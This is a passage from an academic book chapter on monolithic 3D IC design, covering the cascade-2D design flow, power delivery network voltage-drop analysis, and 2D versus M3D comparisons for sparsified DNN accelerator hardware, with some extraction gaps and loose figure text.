modules into separate tiers. Depending on the type of design, the designer may wish
to employ different partitioning criteria than presented here and the subsequent steps
(MIV Planning Stage and Cascade-2D Stage) would remain the same. Hence, this
flow is an ideal platform to evaluate different tier partitioning schemes for M3D ICs.
At this stage, it is important to understand that there are two types of IO ports
in the design. There are a set of IO ports that were created because of the “design-
aware partitioning” step. These IO ports connect the top and bottom groups of the
design, and they are referred as MIV ports since they eventually become MIVs in an
M3D IC. Additionally, there exist a set of IO ports for the top-level pre-partitioned
design. These are same as the conventional IO ports of 2D ICs.
fact that all cell placement algorithms in commercial EDA tools tend to place cells
close to IO ports to minimize timing, the bottom group is implemented using the
location of MIVs determined from the top group implementation. In this way, the
cell placement of the top group guides the cell placement of the bottom group using
the pre-fixed MIV ports.
The IO ports of the top-level design are assumed to be connected only to the top
tier in M3D ICs. Therefore, it is possible that some IO signals need to be directly
connected to functional modules in the bottom group. These feed-through signals
will not have any driving or receiving cells on the top group. Hence, the MIV
ports for those signals cannot be placed with top group implementation and are
determined during the bottom group implementation.
Figure 11 shows the location of MIVs after implementing the bottom group.
After obtaining the location of complete set of MIVs, standard cell placement in the
top and bottom group implementation is discarded, and only the MIV locations are
retained.
Cascade-2D Stage
In this step, a cascade-2D design is implemented, which models an M3D IC in a
single 2D design with sets of anchor cells and dummy wires, using partitioning
technique supported in Cadence® Innovus™.
First, a new die with both tiers placed side by side is created, with the same total
area as the original 2D design. Top and bottom partitions are defined in the die, and
a hard fence for placement is set, so that cells in the top partition are placed only on
the top half of the die, and cells in the bottom partition only on the bottom half of
the die. Then, two hierarchies of the design are created as follows:
766 K. Chang and S. K. Lim
a b c
MIV Ports
(white dots)
Anchor Cells
Cutline
Anchor Cells
Fig. 12 GDS layouts in each step in cascade-2D design flow. (a) Top view after placing pins for
MIVs, (b) after assembling top view and top- and bottom-partition view, (c) after implementing
cascade-2D designs
• First level of hierarchy: Top view, which contains only two cells, top-partition cell
and bottom-partition cell. These two cells contain pins which represent MIVs for
the top and bottom tier, respectively.
• Second level of hierarchy: Top-partition cell, which contains the top-partition
view where standard cells from the top group are placed and routed.
• Second level of hierarchy: Bottom-partition cell, which contains the bottom-
partition view where standard cells from the bottom group are placed and routed.
In the top view, pins are placed, representing MIVs, in the top-partition cell
and bottom-partition cell on the top routing metal layer (i.e., M6 in Fig. 8). The
pin locations are the same as the MIV location derived in MIV Planning Stage.
Figure 12a shows placed pins for MIVs in the top view.
Then, using 3 ∼ 4 additional metal layers above the top routing metal layer used
in the actual design, (i.e., M7 ∼ M8 in Fig. 8), the pins on the top-partition cell
and bottom-partition cell are routed and connected. As the location of the pins is
identical in the x-axis in the top- and bottom-partition cells, the routing tool creates
long vertical wires crossing two partition cells. These additional 3 ∼ 4 metal layers
used to connect the pins of the top- and bottom-partitioning cells are called “dummy
wires” because their only function is to get logical connection between the two tiers
in the physical design. The delay and RC parasitics associated with these wires will
not be considered in the final M3D IC.
In an M3D IC, the topmost metal layer of the bottom tier is connected to the
bottommost metal layer of the top tier using an MIV. To emulate this connectivity
in a 2D IC where the top and bottom tiers are placed adjacent to each other,
a mechanism to connect the bottommost metal layer (i.e., M1 in Fig. 8) in the
top-partition view with the topmost metal layer (i.e., M6 in Fig. 8) in the bottom-
partition view is required. This is achieved through “anchor cells.” An anchor cell is
a dummy cell which implements buffer logic. Anchor cells model zero-delay virtual
connection between a dummy wire and one of the metal layers. After connecting
22 Design and Tool Solutions for Monolithic Three-Dimensional Integrated Circuits 767
a b c
M6 M6 Bottom-Tier M6
Top-Tier-Driving Top-Tier-Receiving Anchor Cell
Anchor Cell Anchor Cell
M1 M1 M1
out in in/out
Fig. 13 Three types of anchor cells: (a) a top-tier-driving anchor cell, (b) a top-tier-receiving
anchor cell, and (c) a bottom-tier anchor cell
the two partition cells with dummy wires, anchor cells are placed below the pins in
each partition view. In this step, only anchor cells are placed but not logic cells.
Depending on the partition using anchor cells and metal layer to which a dummy
wire needs to be virtually connected, three flavors of anchor cells exist: (1) top-
tier-driving anchor cells (Fig. 13a), which are placed in the top partition, receiving
signals from M1 of top partition, and driving a dummy wire, (2) top-tier-receiving
anchor cells (Fig. 13b), which send signal in the reverse direction, and (3) bottom-
tier anchor cells (Fig. 13c), which are placed in the bottom partition, connecting
a dummy wire to top metal layer of the bottom partition. After placement, anchor
cells and the corresponding MIV ports are connected.
Next, all hierarchies are flattened, i.e., the top view and both partition views are
assembled projecting all anchor cells in two partition views and dummy wires in the
top view into a single design. Figure 12b shows the assembled design.
With the assembled design, the delay of dummy wires is set to zero, and anchor
cells and dummy wires are set to be fixed, so that their location cannot be modified.
These sets of anchor cells and dummy wires effectively act as “wormholes” which
connect the bottommost metal layer of the top partition and the topmost metal layer
of the bottom partition without delay emulating the behavior of MIVs (the MIV RC
parasitics are added in the final timing stage).
Then regular 2D IC design flow is performed, which involves all the design stages
including placement, post-placement optimization, clock tree synthesis (CTS), post-
CTS optimization, routing, and post-route optimization. Owing to (1) “wormholes,”
which provide virtual connection between the bottommost metal layer of the top
partition and the topmost metal layer of the bottom partition, and (2) the hard fence,
which sets the boundary for top and bottom partition, the tool places each tier in its
separate 2D partitioned space with virtual connections between them, resulting in a
cascade-2D design.
CTS in cascade-2D design flow is performed as regular 2D IC design flow.
A clock signal is first divided into two branches in the top partition. One of the
branches is used for generating the clock tree in the top partition, and the other
branch is connected to the bottom partition through a set of anchor cells and a
dummy wire and used for generating the clock tree in the bottom partition.
Figure 12c shows the resulting cascade-2D design. Although the delay of dummy
wires is set to zero, their RC parasitics still exist in this stage of the design.
768 K. Chang and S. K. Lim
Therefore, the cascade-2D design is again split into top and bottom partitions,
pushing all cells and wires to the corresponding partitions except dummy wires.
Then, RC parasitics for each partition are extracted. The final M3D IC is created by
connecting these two extracted designs with MIV RC parasitics. Timing and power
analysis is done on the final M3D IC.
Fig. 14 GDS layouts of (a) 28 nm 2D, (b) 28 nm cascade-2D M3D, (c) 14/16 nm 2D, (d)
14/16 nm cascade-2D M3D, (e) 7 nm 2D, and (f) 7 nm cascade-2D M3D ICs of the application
processor at 1.0 GHz
22 Design and Tool Solutions for Monolithic Three-Dimensional Integrated Circuits 769
B
A
Fig. 15 Color map of functional modules in application processor 7 nm (a) 2D IC and (b) cascade-
2D M3D IC of commercial application processor at 1.0 GHz
node and design frequency. In the best-case scenario, M3D IC shows 20% power
reduction than the 2D IC (14/16 nm technology node at 1.1 GHz frequency) at the
same performance point.
Fig. 17 Power saving of cascade-2D M3D (solid lines) and shrunk-2D M3D (dotted lines) ICs
over 2D ICs in 28 nm, 14/16 nm, and 7 nm technology nodes
Fig. 18 Wire-length reduction comparison between cascade-2D (solid lines) and shrunk-2D
(dotted lines) M3D ICs over 2D ICs
vertical integration between cells through MIVs. Table 4 compares the number of
MIVs shrunk-2D M3D and cascade-2D M3D ICs. Since shrunk-2D design flow
partitions cells into two tiers, whereas cascade-2D design flow partitions functional
blocks, the number of MIVs in shrunk-2D M3D ICs is an order of magnitude higher
22 Design and Tool Solutions for Monolithic Three-Dimensional Integrated Circuits 771
Table 5 Normalized iso-performance comparison of 2D, shrunk-2D M3D, and cascade-2D M3D
ICs with application processor in 28 nm, 14/16 nm, and 7 nm technology nodes. All values are
normalized to corresponding 28 nm 2D parameters. Capacitance and power values are normalized
to 28 nm 2D total capacitance and 28 nm 2D total power, respectively
Parameters 28 nm 14/16 nm 7 nm 28 nm 14/16 nm 7 nm 28 nm 14/16 nm 7 nm
Std. cell area 1 0.331 0.077 −7.6% −6.8% −7.5% −9.5% −11.9% −8.8%
Wire-length 1 0.728 0.404 −19.3% −24.1% −24.6% −11.9% −22.6% −12.2%
Wire cap 0.531 0.375 0.205 −18.1% −14.2% −13.7% −9.5% −19.7% −19.2%
Pin cap 0.469 0.422 0.203 −12.1% −6.3% −9.7% −11.1% −13.2% −7.9%
Total cap 1 0.797 0.408 −15.5% −10.1% −11.7% −9.6% −15.2% −12.9%
Internal 0.428 0.282 0.128 −4.8% −7.6% −4.7% −14.5% −15.2% −11.1%
power
Net 0.505 0.318 0.119 −13.4% −10.6% −10.1% −13.0% −20.8% −15.1%
switching
power
Leakage 0.066 0.002 0.000 −7.7% −4.0% −2.0% −9.5% −7.7% −2.8%
power
Total power 1 0.602 0.247 −9.3% −9.1% −7.2% −13.4% −18.1% −13%
than that in cascade-2D M3D ICs. Better wire-length savings using shrunk-2D
design flow can be attributed to the large number of MIVs.
The large number of MIVs in shrunk-2D M3D ICs helps to reduce wire-length,
but it also increases the total capacitance of MIVs, limiting the wire capacitance
reduction. As shown in Table 5, although shrunk-2D M3D ICs reduce more wire-
length than cascade2D M3D ICs in 14/16 nm and 7 nm designs, the wire capacitance
reduction of cascade-2D M3D ICs higher than shrunk-2D M3D ICs. Additionally,
there is a negative impact of the large number of MIVs on the wire capacitance
mainly because of the bin-based partitioning scheme of shrunk-2D design flow
(Panth et al. n.d.). While the bin-based partitioning helps distribute cells evenly on
both tiers, it has a tendency to partition cells connected using local wires into two
tiers, increasing the wire capacitance.
On the other hand, cascade-2D M3D ICs save their power mainly by reducing
standard cell area. Shrunk-2D design flow uses a shrunk-2D design to estimate
the wire-length and the wire RC parasitics of the resulting M3D IC. However,
while shrinking process geometries, minimum width of each metal layer is also
scaled, and extrapolation is performed by tools during RC extraction of wires.
This extrapolation tends to overestimate wire RC parasitics, especially in scaled
technology nodes, which results in a large number of buffers inserted in a design
to meet timing (Chang et al. 2017). In cascade-2D design flow, buffers are inserted
while implementing and optimizing top and bottom partitions simultaneously with
772 K. Chang and S. K. Lim
actual process geometries, cascade-2D design flow achieves more standard cell area
than shrunk-2D design flow as shown in Fig. 19.
With a reduction in standard cell area, the cell density of the M3D IC reduces
as well. Hence, leveraging this feature of M3D ICs to increase cell density and
reduce die area, two separate M3D ICs are implemented using cascade-2D design
flow, one with the same total die area as the 2D IC and another with 10% reduced
area. Table 6 shows that similar power savings can be achieved with a reduced die
area M3D IC. The ability to get reduced die area makes M3D stacking technology
extremely attractive for mainstream adoption because less area directly translates to
reduced costs.
Standard cell area reduction affects both internal power, pin capacitance switch-
ing power reduction, whereas wire-length reduction reduces only wire capacitance
switching power. Figure 20 shows the power breakdown of 2D, cascade2D M3D,
and shrunk-2D M3D ICs. As shown in the figure, the internal power and pin
capacitance switching power, which depends on the standard cell area, account for
Fig. 19 Standard cell area saving in cascade-2D (solid lines) and shrunk-2D (dotted lines) M3D
ICs over 2D ICs
Fig. 20 Breakdown of the power consumption of 2D, shrunk-2D, and cascade-2D M3D ICs in
28 nm, 14/16 nm, and 7 nm technology nodes at 1.0GHz in foundry 28 nm, 14/16 nm, and 7 nm
technology nodes
over 70% of the total power, and they contribute even more in 14/16 nm and 7 nm
designs. Cascade-2D M3D ICs reduce more standard cell area compared to shrunk-
2D M3D ICs by attacking 70% of the total power; they achieve better power savings
consistently, even though the wire-length reduction of cascade-2D M3D ICs is less
than shrunk-2D M3D ICs.
Challenges in designing a reliable PDN increase mainly due to lower supply voltage,
faster operating clock frequency, and higher power density. Along with restricted
budget of resources and cost, these challenges may cause functional failures and
performance degradation due to parasitics-induced voltage drop in a non-ideal PDN.
The total voltage drop is decomposed into a resistive component (IR-drop) and
an inductive component (Ldi/dt-drop). Increasing the metallization in a PDN can
mitigate the resistive component of the voltage drop using wider interconnects while
taking into account routing resources and cost budget.
Meanwhile, the inductance of a package including controlled collapsed chip
connection (C4) bumps leads to significant Ldi/dt-drop due to time-varying current
drawn by cells in a die. In order to mitigate this drop, decoupling capacitors (decaps)
774 K. Chang and S. K. Lim
are utilized for local charge storage. Decaps can be placed on a die with decoupling
cells (decap cells), or explicitly added in the package. However, this decap along
with resistance and inductance of a PDN forms an RLC circuit resulting in its own
resonance frequency (Larsson 1998). If the resonance frequency lies on the system’s
operating frequency range, a significant Ldi/dt-drop can be induced, and hence, it is
crucial to have low input impedance across a wide range of frequencies.
While the PDNs of 2D ICs (i.e., 2D PDNs) have been explored actively (Larsson
1998) (Pant and Chiprout 2006), the PDNs of M3D ICs (i.e., M3D PDNs) have
not been studied widely. A study for a system-level PDN for TSV-based 3D ICs
is presented in Khan et al. (2011), but the PDNs in M3D ICs and in TSV-based
3D ICs show quite different characteristics due to their tier-connection method
and achievable vertical integration density. In TSV-based 3D ICs, supply power is
delivered directly to power pads of each tier through dedicated power TSVs, forming
parallel resistive paths between multiple tiers. However, in M3D ICs, instead of
having external power pads on the bottom tier, power MIVs are utilized to connect
the bottommost metal layer of the top-tier PDN and the topmost metal layer of the
bottom-tier PDN, consisting of series resistive paths across multiple tiers, which
makes bottom-tier cells experience much longer resistive paths compared to TSV-
based 3D ICs. Furthermore, irregular power MIV placement due to the cells on
the top tier makes power delivery issue more complicated in M3D ICs. For these
reasons, M3D ICs suffer much higher voltage drop in the static mode, especially
on the bottom-tier cells as shown in Table 7 compared to TSV-based 3D ICs (Khan
et al. 2011).
Although the series resistive paths of an M3D PDN worsen the voltage drop in
the static mode, they benefit the voltage drop in the dynamic mode by improving
resiliency against AC current noise, which will be discussed in later. Thus, the
difference in the voltage drop between the 2D and the M3D IC in the dynamic
mode is 7.3%, which is similar to TSV-based 3D ICs (Khan et al. 2011).
The PDNs of 2D and M3D ICs are compared taking two analysis modes into
account. The static mode is a vector-less analysis mode wherein the switching
activity of cells is averaged into a single instance. In the dynamic mode, a real
workload-based (i.e., vector-based) power analysis is performed for a given period
of time. The dynamic mode thus incorporates the impact of inductive transients by
taking into account workload-dependent time-varying current flow.
tier-by-tier
scale up & tier partition
timing-driven routing
3 We used shrunk-2D design flow in this study instead of other flows that are published in the
literature. This is because shrunk-2D was the only flow that supported PDN routing at the time of
this manuscript. However, our results should not depend heavily on which M3D signal routing to
be used in the overall flow.
22 Design and Tool Solutions for Monolithic Three-Dimensional Integrated Circuits 777
Table 8 Width, pitch, and utilization of the 2D and M3D PDNs. Same specs are used for both 2D
and M3D (both top and bottom tier) ICs
Metal layer Direction Width (μm) Pitch (μm) Utilization
M2 H 0.07 1.4 10.0%
M5 V 0.28 14 20.6%
M6 H 0.28 14 20.6%
M7 V 0.8 42 11.1%
Table 9 Design metrics and decoupling capacitance of the created decap cells
Cell name Cell width (μm) Cell height (μm) Capacitance (fF)
DECAP_ × 1 0.19 1.4 3.4
DECAP_ × 2 0.38 1.4 6.8
DECAP_ × 4 0.76 1.4 13.7
DECAP_ × 8 1.52 1.4 27.3
DECAP_ × 16 3.04 1.4 54.7
DECAP_ × 32 6.08 1.4 109.4
M2 and M5 power rails are connected with only via arrays, which cross M3 and M4.
M5 to M7 power rails form a mesh structure to distribute power across the chip.
Since NanGate FreePDK45 Open Cell Library does not provide decap cells,
decap cells are created with various sizes for the experiment. Table 9 shows the
size and decoupling capacitance of the decap cells. The decoupling capacitance of
each cell is derived using the method presented in Bozorgzadeh and Afzali-Kusha
(2008). With the fully placed and routed 2D and M3D ICs, decap cells are first
placed next to clock buffers driving the clock pins of flip-flops, which usually suffer
from high Ldi/dt-drop. Then, rest of decap cells are placed in empty area of the
designs to meet a target decoupling capacitance of the chip.
The power and ground pads of the designs are located on the top metal layer
of designs (M7 for the 2D ICs, M7 of the top tier for the M3D ICs) with 120 μm
spacing, which model the C4 bumps of the designs.
Analysis Methods
Figure 23 shows the number of switched cells in the DCT design during a workload-
based simulation. The vector-based power consumption in Table 10 is measured
during the time step which shows the highest switching activity throughout the
simulation (blue bar in Fig. 23), while the statistical power consumption of
the designs is calculated assuming the switching ratio of the primary input and
sequential logic as 20% and 10%, respectively. Therefore, the dynamic power (i.e.,
internal + net switching power) shows significant difference between two analysis
methods, whereas the static power (i.e., leakage power) remains similar.
The M3D ICs offer power benefit over their 2D counterparts. Since M3D ICs
utilize short vertical integration with MIVs instead of using long metal wires on the
xy-plane, the wire-length of the designs is reduced as shown in Table 10, offering
778 K. Chang and S. K. Lim
Fig. 23 Number of the switched cells in a DCT design during a workload-based simulation. Only
the time period which shows the highest switching activity (blue bar) is used for the analysis
net switching power saving. In addition, since the cells drive the reduced wire-load,
the number of buffers as well as the drive-strength of the cells decreases, which,
in turn, reduces the standard cell area, hence, showing benefits on the internal and
leakage power consumption.
Instance voltage drop is used, which is the voltage drop a cell experiences as
Eq. 5.
Vinst = VDD,nom − VDD,act + VSS,act − 0 , (5)
where Vinst is instance voltage drop and VDD,nom is nominal voltage. VDD,act and
VSS,act are actual voltage level on the power and ground pin of the cell. Instance
voltage drop can be further decomposed into the voltage drops on each metal layer.
Figure 24 shows the decomposed voltage drop at each metal layer (voltage values in
black) for the cell experiencing the worst instance voltage drop in static rail analysis
of the JPEG M3D IC, showing how much IR-drop the power rails in each metal
layer has contributed to the total instance IR-drop.
1,100mV
C4 bump
-5.6mV SYS
IM7T
1,094mV -27.5mV M7T
1,067mV -12.3mV M6T
1,055mV -3.6mV M5T
top
tier
1,051mV -3.2mV M2T
top-tier cell
1,048mV -1.5mV M1T
IM7B
1,046mV -7.1mV M7B
1,039mV -1.9mV M6B
1,037mV -0.4mV M5B
bottom
tier
1,037mV -2.1mV M2B
bottom-tier cell
1,035mV -1.3mV M1B
1,033mV
Fig. 24 Illustration describing how the worst instance IR-drop can be decomposed into each metal
layer, showing voltage drops on the power rails in each metal layer (values in black) and voltage
level on each metal layer along the IR-drop path (values in red)
Fig. 25 Breakdown of the worst instance IR-drop across the metal layers comparing 2D and
M3D ICs. M7B denotes M7 of the bottom tier in the M3D ICs. SYS represents the system model
including C4 bump, package, and PCB model
of the top tier is greater than those of the bottom tier (e.g., IM7_T > IM7_B in Fig. 26)
since top-tier metal layers deliver current to both top- and bottom-tier cells, whereas
only current drawn by bottom-tier cells flows on bottom-tier metal layers. Therefore,
the minimum IR-drop path in Fig. 26 to deliver power to a bottom-tier cell utilizes
22 Design and Tool Solutions for Monolithic Three-Dimensional Integrated Circuits 781
target cell
min IR-drop path
the minimum length of top-tier power rails. However, the path can be blocked by
a missing power MIV. The absence of power MIVs stems from top-tier cells since
MIVs cannot penetrate those cells in order to preserve their active areas. In this case,
the current needs to flow through an alternative path shown as actual path in Fig. 26,
which utilizes longer top-tier metal wires and hence exhibits worse IR-drop due to
higher current in those wires.
Reduced number of C4 bumps in M3D ICs also degrades voltage integrity.
As the footprint of an M3D IC is half of its 2D counterpart, the number of the
C4 bumps that can be placed on an M3D IC is approximately half of those in the
2D IC as shown in Table 10. This affects the amount of the current flowing through
each C4 bump. Table 11 compares the current flowing through C4 bumps in the 2D
and M3D ICs. Up to 155.7% higher current flows through the C4 bumps in the M3D
ICs incurring significant difference in IR-drop on the top metal layers (i.e., M7 and
M6 in Fig. 25).
Fig. 27 Breakdown of the worst instance dynamic voltage drop (= IR-drop + Ldi/dt-drop) across
the metal layers comparing 2D and M3D ICs
Fig. 28 Comparison of the worst voltage drop experienced at C4 bumps showing the impact of
decoupling capacitance in 2D and M3D ICs. The decoupling capacitance is set to 30% of the total
capacitance of each design
RLC circuits with the corresponding inductors, showing their unique resonance
frequencies.
To perform an in-depth frequency- and time-domain analysis on a PDN, a
reasonable die model which represents 2D and M3D full-chip System-on-Chip
(SoC) is needed. Since the benchmarks used in this work are small compared to full-
chip SoCs, their parameters are used to create a full-chip die model. Table 12 shows
the effective resistance and capacitance of the PDN of each benchmark (RPDN,eq
and CPDN,eq + CDIE_DC,eq in Fig. 21, respectively). As a design becomes larger,
the capacitance of its PDN increases due to the increased ground and coupling
capacitance of the PDN, while the resistance becomes smaller because more number
of parallel resistive paths to the cells are available. To ease in modeling, the average
784 K. Chang and S. K. Lim
Fig. 29 Impedance seen from the die by sweeping the frequency of AC load current source,
ILOAD,eq
of the RC product from the three benchmarks is used, and a full-chip die is modeled
by assuming CPDN,eq + CDIE_DC,eq = 10 nF, resulting in the associated resistances
as 7.87 m and 18.9 m for the 2D and M3D ICs, respectively.
Figure 29 shows the frequency response of the 2D and M3D full-chip
SoC sweeping the frequency of the AC load current source, ILOAD,eq . Three
resonance frequency points are observed, first-order resonance caused by
CPDN,eq + CDIE_DC,eq coupled with LC4 , second-order resonance by CPKG_DC with
LPKG , and third-order resonance by CBULK_DC with LPCB . While third-order and
second-order resonance occurs at a few kHz and MHz range, the largest resonance,
first-order resonance is in the range between 50 MHz and 200 MHz. Although
the M3D IC shows 16.7% increase at second-order resonance frequency, as the
operating frequencies of full-chip SoC at advanced technology nodes are in the
range of first-order resonance frequencies, it is crucial to minimize the first-order
resonance impact for a robust PDN.
As shown in the figure, the M3D IC exhibits 35.9% lower peak impedance at
first-order resonance frequency because of high effective resistance of the M3D
PDN due to series resistive paths across tiers. An interesting point is that the high
resistance of M3D PDNs, which worsens IR-drop, in fact, improves the resiliency
against AC current noise by damping noise at worst-case resonance oscillation.
Figure 30a and b shows the improved resiliency of the M3D PDN, showing the
time-domain response for a unit step, which models in-rush current simulation, and
for a 112 MHz (first-order resonance frequency) unit sine-wave load current source.
Equation 6 explains the die voltage response affected by first-order resonance for a
unit step load current source (Pant and Chiprout 2006):
22 Design and Tool Solutions for Monolithic Three-Dimensional Integrated Circuits 785
Fig. 30 Transient voltage response for (a) a unit step and (b) a unit 112 MHz (first-order
resonance frequency) sine-wave load current source, ILOAD,eq . Third-order resonance frequency is
not shown in (a) for brevity
2LC4 − 2LR t
VDIE ∼
= 2R + e C4 sin (ωr − θ ) , (6)
CDIE,eq
DNNs have become ubiquitous in many machine learning applications, from speech
recognition (Deng et al. 2013; Graves et al. 2013) and natural language processing
(Conneau et al. 2017), to image recognition (Krizhevsky et al. 2012; He et al.
2015) and computer vision (Karpathy and Fei-Fei 2017). Large neural network
models have proven to be very powerful in all the stated cases, but implementing
786 K. Chang and S. K. Lim
DNN Topology
Starting from a fully connected DNN, a Gaussian Mixture Model (GMM) is adopted
for acoustic modeling (Su et al. 2010). Since it has been shown that DNNs in
22 Design and Tool Solutions for Monolithic Three-Dimensional Integrated Circuits 787
fMLLR HMM
1 2
L1 L2 L3 L4
N2 N2 N2 N2
440 1947
fMLLR HMM
fMLLR 2 3 HMM
features L1 L2 L3 L4 states
N3 N3 N3 N3
HMM
4
fMLLR
440
L1 L2 L3 L4
N1024 N1024 N1024 N1024
HMM
1947
N
E=− ti · ln (yi ) , (7)
i=1
where N is the size of the output layer, yi is the ith output node, and ti is the ith target
value or label. The mini-batch stochastic gradient method (Gardner 1984) is used to
update the weights. The weight Wij is updated in the (k + 1)th iteration using Eq. 8.
788 K. Chang and S. K. Lim
Wij k+1
= Wij k + Cij − lr Wij k + m Wij k−1 , (8)
where m is the momentum, lr is the learning rate, and Cij is the binary connection
coefficient between two subsequent neural network layers for CGS. In CGS, only
the weights that correspond to the location where Cij = 1 are updated. The change
in weight for each iteration is the differential of the cost function with respect to the
weight value:
δE
W = (9)
δW
such that the loss reduces in each iteration. The training procedure is performed on
a graphics processing unit (GPU) with 32-bit floating point values.
After training, feed-forward computation is performed for classification, through
matrix vector multiplication of weight matrices and neuron vectors in each layer
to obtain the output of the final layer. The Rectified Linear Unit (ReLU) function
(Krizhevsky et al. 2012) is used for the non-linear activation function at the end of
each hidden layer.
Coarse-Grain Sparsification
To efficiently map sparse weight matrices to memory arrays, CGS methodology
(Kadetotad et al. 2016) is employed. In CGS, connections between two consecutive
layers in a DNN are compressed in a block-wise manner. An example of block-
wise weight compression is demonstrated in Fig. 32. For a given block size of
16 × 16, it reduces a 1024 × 1024 weight matrix to 64 × 64 weight blocks. With
a compression ratio of 87.5%, only eight weight blocks (= 12.5%) remain non-
1 weight block = 64
16x16 weights
Fig. 32 An example of block-wise weight compression in CGS. A 1024 × 1024 weight matrix is
divided into 64 × 64 weight blocks with each weight block having 16 × 16 weights (i.e., block
size of 16 × 16). A total of 87.5% of weight blocks are dropped using CGS. The remaining 12.5%
weight blocks are stored in memory
22 Design and Tool Solutions for Monolithic Three-Dimensional Integrated Circuits 789
zero for each block row, thus allowing for efficient compression of the entire weight
matrix with minimal index.
CGS, when compared to recent neural network compression algorithms such as
in Han et al. (2016) and Cheng et al. (2015), offers simpler hardware implementation
through CGS multiplexers and multiplier-accumulators (MACs). In Han et al.
(2016), a complex sparse matrix vector multiplication module is required. On the
other hand, the methodology in Cheng et al. (2015) offers to reduce the order
of computations needed for a matrix of size n to O(nlogn) and reduce the space
required to store the matrix to O(n). However, there is considerable loss in accuracy
when the size of the matrix increases, and hardware for computing FFT and inverse
fast Fourier transform (IFFT) is required. The issue of matrix size is resolved in
Liao et al. (2017) using block-circulant matrices, but the advantage of using FFT
and IFFT to compute matrix vector multiplications is lost if the size of the blocks
reduces significantly. This restriction is not present if CGS is used.
GPU-accelerated DNN computations can also benefit from CGS. With CGS,
along with the testing inference, training complexity can also be reduced due to
the sparse nature of the weight matrices. The structured sparseness allows for
writing customized GPU kernels that only need to operate on the non-zero elements,
significantly speeding up training and reducing GPU power consumption as shown
in (Gray et al. 2017).
In order to study the impact of M3D ICs on the power, performance, and area
of different DNN architectures, the block sizes are swept for the compression ratio
of 87.5%, and the two DNN architectures that have the two lowest phoneme error
rates (PER) for the TIMIT dataset are selected for hardware implementation. The
two architectures chosen are the DNN with 16 × 16 block size (DNN CGS-16) and
the DNN with 64 × 64 block size (DNN CGS-64), as shown in Table 13.
1024N
1024N
output demux
output neurons
MAC #1
input neurons
neuron select
128N
16N
12
12
mac mux
ReLU
MAC #2
MAC #16
1024N 16W
shift 16W
reg FSM
weight weight weight
12
SRAM SRAM SRAM
input frame #1 #2 #6
Fig. 33 Block diagram of the CGS-based DNN architecture for speech recognition
logic
logic logic
logic
logic logic
Fig. 34 GDS layouts of the implemented DNN CGS-16 and CGS-64 architectures at 400 MHz
target clock frequency. DNN CGS-16 (a) 2D IC, (b) M3D-both, (c) M3D-one, DNN CGS-64, (d)
2D IC, (e) M3D-both, (f) M3D-one
792 K. Chang and S. K. Lim
Table 14 Iso-performance (400 MHz) design metric comparison of 2D and M3D ICs of DNN
CGS-16 and CGS-64 architectures. All percentage values show the reduction from their 2D
counterparts
Parameter 2D M3D-both % M3D-one %
DNN CGS-16
Footprint (μm) 1411 × 1411 1010 × 984 −50.1% 996 × 1322 −33.9%
Wire-length (m) 12.089 8.469 −29.9% 12.225 1.1%
Cell count 298,309 262,084 −12.1% 290,692 −2.6%
Cell area (mm2 ) 0.505 0.431 −14.6% 0.511 1.1%
Mem area (mm2 ) 1.287 1.287 0.0% 1.287 0.0%
MIV count – 77,536 1776
Pin cap (pF) 943.3 788.0 −16.5% 1004.1 6.4%
Wire cap (pF) 2216.8 1440.8 −35.0% 2087.4 −5.8%
Total cap (pF) 3160.1 2228.7 −29.5% 3091.6 −2.2%
DNN CGS-64
Footprint (μm) 1411 × 1411 1010 × 984 −50.1% 996 × 1322 −33.9%
Wire-length (m) 5.631 3.734 −33.7% 7.134 26.7%
Cell count 163,361 149,921 −8.2% 174,292 6.7%
Cell area (mm2 ) 0.314 0.269 −14.3% 0.328 4.7%
Mem area (mm2 ) 1.287 1.287 0.0% 1.287 0.0%
MIV count – 48,636 1776
Pin cap (pF) 520.8 390.8 −25.0% 553.5 6.3%
Wire cap (pF) 920.1 573.7 −37.7% 1110.5 20.7%
Total cap (pF) 1440.9 964.4 −33.1% 1664.0 15.5%
compared with the 2D ICs, whereas the M3D-one designs obtain only 33.9%
reduction. This difference is attributed to the large memory area compared with
logic in the DNN CGS-16 2D IC. These large memory blocks, if placed in the same
tier, cause the footprint to increase significantly.
The wire-length saving reaches 29.9% and 33.7% in CGS-16 and CGS-64,
respectively, with the M3D-both designs. This significant wire-length saving comes
from the 50% smaller footprint and shorter distance among cells in M3D ICs. The
M3D-both design for CGS-16 architecture achieves 12.1% cell count reduction,
which leads to 14.6% total cell area saving. This saving mainly comes from fewer
buffers and smaller gates needed to close timing in M3D ICs compared with the 2D
counterparts. The savings in CGS-64 architecture are 8.2% and 14.3% for the cell
count and area, respectively.
The 77 K MIVs are utilized in the CGS-16 architecture, while 48 K MIVs are
used in CGS-64. This is mainly because CGS-16 design is more complex than CGS-
64 (to be further discussed in later), so that the tier partitioning cutline cuts through
more inter-tier connections in CGS-16. In the M3D-one design, logic and memory
are separated into different tiers. This logic-memory connectivity is not high in the
DNN architecture (= 1.7 K).
22 Design and Tool Solutions for Monolithic Three-Dimensional Integrated Circuits 793
logic
b
logic
a top tier
memory
top tier
memory
logic memory
Fig. 35 Cell placement of the modules in CGS-16 architecture. (a) 2D, (b) M3D-both, (c) M3D-
one. Each module is highlighted with different colors
In the CGS-16 architecture, the 16.5% pin capacitance saving is from cell area
reduction, while the 35.0% wire capacitance saving is from wire-length reduction.
By comparing the raw data, the DNN architecture is wire-dominated. The pin and
wire capacitance saving reaches 25.0% and 37.7% in CGS-64.
To better understand why M3D-one gives significantly worse results than M3D-
both, a placement comparison among 2D, M3D-both, and M3D-one designs is
shown in Fig. 35. In the M3D-both design shown in Fig. 35b, the logic cells related
to memory blocks in the top tier are placed in the same tier as the memory and
densely packed to reduce wire-length effectively. This is the same for the bottom
tier in the M3D-both design. On the other hand, logic gates are rather spread out
across the top tier in the M3D-one design shown in Fig. 35c. This results in 1.1%
increase in wire-length for CGS-16 and 26.7% increase in wire-length for CGS-
64 compared with the 2D counterparts. This highlights the importance of footprint
management and tier partitioning in the presence of large memory modules in DNN
architectures.
Power Comparisons
Table 15 presents the iso-performance power comparison between 2D and M3D
ICs of CGS-based DNNs. Internal, net switching, and leakage power breakdown is
794 K. Chang and S. K. Lim
Table 15 Iso-performance (400 MHz) power metric comparison of two architectures (CGS-16
vs. CGS-64) using two workloads (classification vs. pseudo-training). All percentage values show
the reduction from their 2D counterparts
Workload Power breakdown 2D M3D-both % M3D-one %
DNN CGS-16
Classification Internal power (mW) 91.3 76.7 −16.0% 90.3 −1.1%
Net switching power (mW) 48.6 31.6 −35.0% 46.5 −4.3%
Leakage power (mW) 1.3 1.2 −6.6% 1.3 0.5%
